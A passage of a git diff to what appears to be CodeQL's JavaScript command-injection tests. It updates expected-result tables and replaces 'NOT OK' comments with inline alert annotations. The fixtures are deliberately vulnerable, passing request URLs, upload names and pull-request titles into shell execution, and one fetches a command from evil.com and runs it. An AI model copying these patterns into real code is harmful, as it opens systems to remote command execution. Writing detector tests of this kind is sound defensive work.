command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| third-party-command-injection.js:6:21:6:27 | command | third-party-command-injection.js:5:20:5:26 | command | third-party-command-injection.js:6:21:6:27 | command | This command line depends on a $@. | third-party-command-injection.js:5:20:5:26 | command | user-provided value | edges | actions.js:8:9:8:57 | title | actions.js:9:16:9:20 | title | provenance | | | actions.js:8:17:8:57 | github. ... t.title | actions.js:8:9:8:57 | title | provenance | | @@ -209,56 +261,3 @@ nodes | third-party-command-injection.js:5:20:5:26 | command | semmle.label | command | | third-party-command-injection.js:6:21:6:27 | command | semmle.label | command | subpaths -#select -| actions.js:9:8:9:22 | `echo ${title}` | actions.js:8:17:8:57 | github. ... t.title | actions.js:9:8:9:22 | `echo ${title}` | This command line depends on a $@. | actions.js:8:17:8:57 | github. ... t.title | user-provided value | -| actions.js:19:14:19:31 | `echo ${head_ref}` | actions.js:18:20:18:63 | github. ... ead.ref | actions.js:19:14:19:31 | `echo ${head_ref}` | This command line depends on a $@. | actions.js:18:20:18:63 | github. ... ead.ref | user-provided value | -| child_process-test.js:17:13:17:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:17:13:17:15 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:18:17:18:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:18:17:18:19 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:19:17:19:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:19:17:19:19 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:20:21:20:23 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:20:21:20:23 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:21:14:21:16 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:21:14:21:16 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:22:18:22:20 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:22:18:22:20 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:23:13:23:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:23:13:23:15 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:39:26:39:28 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:44:5:44:34 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:43:15:43:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:54:5:54:39 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:53:15:53:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:56:54:56:56 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:6:15:6:49 | url.par ... ry.path | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:62:5:62:39 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:53:15:53:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:48:15:48:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:66:19:66:22 | args | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:75:29:75:31 | cmd | child_process-test.js:73:25:73:31 | req.url | child_process-test.js:75:29:75:31 | cmd | This command line depends on a $@. | child_process-test.js:73:25:73:31 | req.url | user-provided value | -| child_process-test.js:83:19:83:36 | req.query.fileName | child_process-test.js:83:19:83:36 | req.query.fileName | child_process-test.js:83:19:83:36 | req.query.fileName | This command line depends on a $@. | child_process-test.js:83:19:83:36 | req.query.fileName | user-provided value | -| child_process-test.js:94:11:94:35 | "ping " ... ms.host | child_process-test.js:94:21:94:30 | ctx.params | child_process-test.js:94:11:94:35 | "ping " ... ms.host | This command line depends on a $@. | child_process-test.js:94:21:94:30 | ctx.params | user-provided value | -| exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) | exec-sh2.js:14:25:14:31 | req.url | exec-sh2.js:10:40:10:46 | command | This command line depends on a $@. | exec-sh2.js:14:25:14:31 | req.url | user-provided value | -| exec-sh.js:15:12:15:61 | cp.spaw ... ptions) | exec-sh.js:19:25:19:31 | req.url | exec-sh.js:15:44:15:50 | command | This command line depends on a $@. | exec-sh.js:19:25:19:31 | req.url | user-provided value | -| execSeries.js:14:41:14:47 | command | execSeries.js:18:34:18:40 | req.url | execSeries.js:14:41:14:47 | command | This command line depends on a $@. | execSeries.js:18:34:18:40 | req.url | user-provided value | -| form-parsers.js:9:8:9:39 | "touch ... nalname | form-parsers.js:9:19:9:26 | req.file | form-parsers.js:9:8:9:39 | "touch ... nalname | This command line depends on a $@. | form-parsers.js:9:19:9:26 | req.file | user-provided value | -| form-parsers.js:14:10:14:37 | "touch ... nalname | form-parsers.js:13:3:13:11 | req.files | form-parsers.js:14:10:14:37 | "touch ... nalname | This command line depends on a $@. | form-parsers.js:13:3:13:11 | req.files | user-provided value | -| form-parsers.js:25:10:25:28 | "touch " + filename | form-parsers.js:24:48:24:55 | filename | form-parsers.js:25:10:25:28 | "touch " + filename | This command line depends on a $@. | form-parsers.js:24:48:24:55 | filename | user-provided value | -| form-parsers.js:36:10:36:31 | "touch ... ds.name | form-parsers.js:35:25:35:30 | fields | form-parsers.js:36:10:36:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:35:25:35:30 | fields | user-provided value | -| form-parsers.js:41:10:41:31 | "touch ... ds.name | form-parsers.js:40:26:40:31 | fields | form-parsers.js:41:10:41:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:40:26:40:31 | fields | user-provided value | -| form-parsers.js:53:10:53:31 | "touch ... ds.name | form-parsers.js:52:34:52:39 | fields | form-parsers.js:53:10:53:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:52:34:52:39 | fields | user-provided value | -| form-parsers.js:59:10:59:33 | "touch ... ilename | form-parsers.js:58:30:58:33 | part | form-parsers.js:59:10:59:33 | "touch ... ilename | This command line depends on a $@. | form-parsers.js:58:30:58:33 | part | user-provided value | -| other.js:7:33:7:35 | cmd | other.js:5:25:5:31 | req.url | other.js:7:33:7:35 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:8:28:8:30 | cmd | other.js:5:25:5:31 | req.url | other.js:8:28:8:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:9:32:9:34 | cmd | other.js:5:25:5:31 | req.url | other.js:9:32:9:34 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:10:29:10:31 | cmd | other.js:5:25:5:31 | req.url | other.js:10:29:10:31 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:11:29:11:31 | cmd | other.js:5:25:5:31 | req.url | other.js:11:29:11:31 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:12:27:12:29 | cmd | other.js:5:25:5:31 | req.url | other.js:12:27:12:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:14:28:14:30 | cmd | other.js:5:25:5:31 | req.url | other.js:14:28:14:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:15:34:15:36 | cmd | other.js:5:25:5:31 | req.url | other.js:15:34:15:36 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:16:21:16:23 | cmd | other.js:5:25:5:31 | req.url | other.js:16:21:16:23 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:17:27:17:29 | cmd | other.js:5:25:5:31 | req.url | other.js:17:27:17:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:18:22:18:24 | cmd | other.js:5:25:5:31 | req.url | other.js:18:22:18:24 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:19:36:19:38 | cmd | other.js:5:25:5:31 | req.url | other.js:19:36:19:38 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:22:21:22:23 | cmd | other.js:5:25:5:31 | req.url | other.js:22:21:22:23 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:23:28:23:30 | cmd | other.js:5:25:5:31 | req.url | other.js:23:28:23:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:26:34:26:36 | cmd | other.js:5:25:5:31 | req.url | other.js:26:34:26:36 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:28:27:28:29 | cmd | other.js:5:25:5:31 | req.url | other.js:28:27:28:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:30:33:30:35 | cmd | other.js:5:25:5:31 | req.url | other.js:30:33:30:35 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:34:44:34:46 | cmd | other.js:5:25:5:31 | req.url | other.js:34:44:34:46 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| third-party-command-injection.js:6:21:6:27 | command | third-party-command-injection.js:5:20:5:26 | command | third-party-command-injection.js:6:21:6:27 | command | This command line depends on a $@. | third-party-command-injection.js:5:20:5:26 | command | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.qlref index f4c8654cda8a..8d677af35712 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.qlref @@ -1 +1,2 @@ -Security/CWE-078/CommandInjection.ql \ No newline at end of file +query: Security/CWE-078/CommandInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js index 1cfea0118bc2..ebc765667a85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js @@ -5,8 +5,8 @@ const { exec } = require('child_process'); // function to echo title function echo_title() { // get the title from the event pull request - const title = github.context.payload.pull_request.title; - exec(`echo ${title}`, (err, stdout, stderr) => { // NOT OK + const title = github.context.payload.pull_request.title; // $ Source + exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert if (err) { return; } @@ -15,8 +15,8 @@ function echo_title() { // function which passes the issue title into an exec function exec_head_ref() { - const head_ref = github.context.payload.pull_request.head.ref; - aexec.exec(`echo ${head_ref}`).then((res) => { // NOT OK + const head_ref = github.context.payload.pull_request.head.ref; // $ Source + aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert console.log(res); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index abc9704a48e8..d11d97fc1c35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js @@ -3,76 +3,76 @@ var cp = require("child_process"), url = require('url'); var server = http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Sink Source - cp.exec("foo"); // OK - cp.execSync("foo"); // OK - cp.execFile("foo"); // OK - cp.execFileSync("foo"); // OK - cp.spawn("foo"); // OK - cp.spawnSync("foo"); // OK - cp.fork("foo"); // OK + cp.exec("foo"); + cp.execSync("foo"); + cp.execFile("foo"); + cp.execFileSync("foo"); + cp.spawn("foo"); + cp.spawnSync("foo"); + cp.fork("foo"); - cp.exec(cmd); // NOT OK - cp.execSync(cmd); // NOT OK - cp.execFile(cmd); // NOT OK - cp.execFileSync(cmd); // NOT OK - cp.spawn(cmd); // NOT OK - cp.spawnSync(cmd); // NOT OK - cp.fork(cmd); // NOT OK + cp.exec(cmd); // $ Alert + cp.execSync(cmd); // $ Alert + cp.execFile(cmd); // $ Alert + cp.execFileSync(cmd); // $ Alert + cp.spawn(cmd); // $ Alert + cp.spawnSync(cmd); // $ Alert + cp.fork(cmd); // $ Alert - cp.exec("foo" + cmd + "bar"); // NOT OK + cp.exec("foo" + cmd + "bar"); // $ Alert // These are technically NOT OK, but they are more likely as false positives - cp.exec("foo", {shell: cmd}); // OK - cp.exec("foo", {env: {PATH: cmd}}); // OK - cp.exec("foo", {cwd: cmd}); // OK - cp.exec("foo", {uid: cmd}); // OK - cp.exec("foo", {gid: cmd}); // OK + cp.exec("foo", {shell: cmd}); + cp.exec("foo", {env: {PATH: cmd}}); + cp.exec("foo", {cwd: cmd}); + cp.exec("foo", {uid: cmd}); + cp.exec("foo", {gid: cmd}); let sh, flag; if (process.platform == 'win32') sh = 'cmd.exe', flag = '/c'; else sh = '/bin/sh', flag = '-c'; - cp.spawn(sh, [ flag, cmd ]); // NOT OK + cp.spawn(sh, [ flag, cmd ]); // $ Alert Sink let args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK - cp.execFile("/bin/bash", args); + args[1] = cmd; // $ Sink + cp.execFile("/bin/bash", args); // $ Alert - let args = []; + args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Sink run("sh", args); - let args = []; + args = []; args[0] = `-` + "c"; - args[1] = cmd; // NOT OK - cp.execFile(`/bin` + "/bash", args); + args[1] = cmd; // $ Sink + cp.execFile(`/bin` + "/bash", args); // $ Alert - cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // NOT OK - cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // NOT OK + cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert Sink + cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert Sink - let myArgs = []; + let myArgs = []; myArgs.push(`-` + "c"); myArgs.push(cmd); - cp.execFile(`/bin` + "/bash", args); // NOT OK - but no support for `[].push()` for indirect arguments [INCONSISTENCY] + cp.execFile(`/bin` + "/bash", myArgs); // $ MISSING: Alert - no support for `[].push()` for indirect arguments }); -function run(cmd, args) { - cp.spawn(cmd, args); // OK - the alert happens where `args` is build. +function run(cmd, args) { // $ Sink + cp.spawn(cmd, args); // $ Alert - but note that the sink is where `args` is build. } var util = require("util") http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source - util.promisify(cp.exec)(cmd); // NOT OK + util.promisify(cp.exec)(cmd); // $ Alert }); @@ -80,7 +80,7 @@ const webpackDevServer = require('webpack-dev-server'); new webpackDevServer(compiler, { before: function (app) { app.use(function (req, res, next) { - cp.exec(req.query.fileName); // NOT OK + cp.exec(req.query.fileName); // $ Alert require("my-sub-lib").foo(req.query.fileName); // calls lib/subLib/index.js#foo }); @@ -91,5 +91,5 @@ import Router from "koa-router"; const router = new Router(); router.get("/ping/:host", async (ctx) => { - cp.exec("ping " + ctx.params.host); // NOT OK -}); \ No newline at end of file + cp.exec("ping " + ctx.params.host); // $ Alert +}); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js index b5b8fc602bdf..9e59ff90b140 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js @@ -12,10 +12,10 @@ function getShell() { function execSh(command, options) { var shell = getShell() - return cp.spawn(shell.cmd, [shell.arg, command], options) // BAD + return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert Sink } http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js index ad91b66f5344..5b6d770a2653 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js @@ -7,10 +7,10 @@ function getShell() { } function execSh(command, options) { - return cp.spawn(getShell(), ["-c", command], options) // BAD + return cp.spawn(getShell(), ["-c", command], options) // $ Alert Sink }; http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js index 25e45d675d9f..45f3e25a8971 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js @@ -11,10 +11,10 @@ function asyncEach(arr, iterator) { } function execEach(commands) { - asyncEach(commands, (command) => exec(command)); // NOT OK + asyncEach(commands, (command) => exec(command)); // $ Alert }; require('http').createServer(function(req, res) { - let cmd = require('url').parse(req.url, true).query.path; + let cmd = require('url').parse(req.url, true).query.path; // $ Source execEach([cmd]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js index 4b1dabde4412..22ca9745c101 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js @@ -6,12 +6,12 @@ var app = express(); var exec = require("child_process").exec; app.post('/profile', upload.single('avatar'), function (req, res, next) { - exec("touch " + req.file.originalname); // NOT OK + exec("touch " + req.file.originalname); // $ Alert }); app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) { - req.files.forEach(file => { - exec("touch " + file.originalname); // NOT OK + req.files.forEach(file => { // $ Source + exec("touch " + file.originalname); // $ Alert }) }); @@ -21,8 +21,8 @@ var Busboy = require('busboy'); http.createServer(function (req, res) { var busboy = new Busboy({ headers: req.headers }); - busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { - exec("touch " + filename); // NOT OK + busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { // $ Source + exec("touch " + filename); // $ Alert }); req.pipe(busboy); }).listen(8000); @@ -32,13 +32,13 @@ const formidable = require('formidable'); app.post('/api/upload', (req, res, next) => { let form = formidable({ multiples: true }); - form.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + form.parse(req, (err, fields, files) => { // $ Source + exec("touch " + fields.name); // $ Alert }); let form2 = new formidable.IncomingForm(); - form2.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + form2.parse(req, (err, fields, files) => { // $ Source + exec("touch " + fields.name); // $ Alert }); }); @@ -49,14 +49,14 @@ http.createServer(function (req, res) { // parse a file upload var form = new multiparty.Form(); - form.parse(req, function (err, fields, files) { - exec("touch " + fields.name); // NOT OK + form.parse(req, function (err, fields, files) { // $ Source + exec("touch " + fields.name); // $ Alert }); var form2 = new multiparty.Form(); - form2.on('part', function (part) { // / file / field - exec("touch " + part.filename); // NOT OK + form2.on('part', function (part) { // $ Source - / file / field + exec("touch " + part.filename); // $ Alert }); form2.parse(req); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js index 2e86ace433ce..d4d4b36b674f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js @@ -2,34 +2,34 @@ var http = require("http"), url = require("url"); var server = http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; - - require("cross-spawn").sync(cmd); // NOT OK - require("execa").shell(cmd); // NOT OK - require("execa").shellSync(cmd); // NOT OK - require("execa").stdout(cmd); // NOT OK - require("execa").stderr(cmd); // NOT OK - require("execa").sync(cmd); // NOT OK - - require("cross-spawn")(cmd); // NOT OK - require("cross-spawn-async")(cmd); // NOT OK - require("exec")(cmd); // NOT OK - require("exec-async")(cmd); // NOT OK - require("execa")(cmd); // NOT OK - require("remote-exec")(target, cmd); // NOT OK + let cmd = url.parse(req.url, true).query.path; // $ Source + + require("cross-spawn").sync(cmd); // $ Alert + require("execa").shell(cmd); // $ Alert + require("execa").shellSync(cmd); // $ Alert + require("execa").stdout(cmd); // $ Alert + require("execa").stderr(cmd); // $ Alert + require("execa").sync(cmd); // $ Alert + + require("cross-spawn")(cmd); // $ Alert + require("cross-spawn-async")(cmd); // $ Alert + require("exec")(cmd); // $ Alert + require("exec-async")(cmd); // $ Alert + require("execa")(cmd); // $ Alert + require("remote-exec")(target, cmd); // $ Alert const ssh2 = require("ssh2"); - new ssh2().exec(cmd); // NOT OK - new ssh2.Client().exec(cmd); // NOT OK + new ssh2().exec(cmd); // $ Alert + new ssh2.Client().exec(cmd); // $ Alert const SSH2Stream = require("ssh2-streams").SSH2Stream; - new SSH2Stream().exec(false, cmd); // NOT OK + new SSH2Stream().exec(false, cmd); // $ Alert - require("execa").node(cmd); // NOT OK + require("execa").node(cmd); // $ Alert - require("foreground-child")(cmd); // NOT OK + require("foreground-child")(cmd); // $ Alert const opener = require("opener"); - opener("http://github.com/" + url.parse(req.url, true).query.user); // OK - opener("http://github.com", { command: cmd }); // NOT OK + opener("http://github.com/" + url.parse(req.url, true).query.user); + opener("http://github.com", { command: cmd }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js index cec3f36aa492..deb426291d6a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js @@ -2,7 +2,7 @@ let https = require("https"), cp = require("child_process"); https.get("https://evil.com/getCommand", res => - res.on("data", command => { - cp.execSync(command); + res.on("data", command => { // $ Source + cp.execSync(command); // $ Alert }) ); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql deleted file mode 100644 index 77e19c320dff..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql +++ /dev/null @@ -1,23 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.CommandInjectionQuery as CommandInjection -import semmle.javascript.security.dataflow.IndirectCommandInjectionQuery as IndirectCommandInjection -import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentQuery as ShellCommandInjectionFromEnvironment -import semmle.javascript.security.dataflow.UnsafeShellCommandConstructionQuery as UnsafeShellCommandConstruction -import semmle.javascript.security.dataflow.SecondOrderCommandInjectionQuery as SecondOrderCommandInjectionQuery - -deprecated class CommandInjectionConsistency extends ConsistencyConfiguration { - CommandInjectionConsistency() { this = "ComandInjection" } - - override File getAFile() { not result.getBaseName() = "uselesscat.js" } -} - -import semmle.javascript.security.UselessUseOfCat - -deprecated class UselessCatConsistency extends ConsistencyConfiguration { - UselessCatConsistency() { this = "Cat" } - - override DataFlow::Node getAnAlert() { result instanceof UselessCat } - - override File getAFile() { result.getBaseName() = "uselesscat.js" } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.expected b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.expected index af0b8090ff7b..7c7321845776 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/IndirectCommandInjection.expected @@ -1,3 +1,44 @@ +#select +| actions.js:4:6:4:29 | process ... _DATA'] | actions.js:4:6:4:16 | process.env | actions.js:4:6:4:29 | process ... _DATA'] | This command depends on an unsanitized $@. | actions.js:4:6:4:16 | process.env | environment variable | +| actions.js:8:10:8:23 | e['TEST_DATA'] | actions.js:12:6:12:16 | process.env | actions.js:8:10:8:23 | e['TEST_DATA'] | This command depends on an unsanitized $@. | actions.js:12:6:12:16 | process.env | environment variable | +| actions.js:14:6:14:21 | getInput('data') | actions.js:14:6:14:21 | getInput('data') | actions.js:14:6:14:21 | getInput('data') | This command depends on an unsanitized $@. | actions.js:14:6:14:21 | getInput('data') | GitHub Actions user input | +| command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:4:10:4:21 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | command-line-parameter-command-injection.js:8:22:8:33 | process.argv | command-line-parameter-command-injection.js:8:10:8:36 | "cmd.sh ... argv[2] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:8:22:8:33 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:11:14:11:20 | args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:11:14:11:20 | args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:12:14:12:32 | "cmd.sh " + args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:15:14:15:25 | fewerArgs[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:16:14:16:37 | "cmd.sh ... Args[0] | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:19:14:19:17 | arg0 | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:19:14:19:17 | arg0 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line-parameter-command-injection.js:20:14:20:29 | "cmd.sh " + arg0 | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:10:13:10:24 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line-parameter-command-injection.js:27:14:27:57 | `node $ ... ption"` | This command depends on an unsanitized $@. | command-line-parameter-command-injection.js:24:15:24:26 | process.argv | command-line argument | +| command-line-parameter-command-injection.js:30:9:30:50 | "cmd.sh ... )().foo | command-line-parameter-command-injection.js:30:21:30:46 | require ... 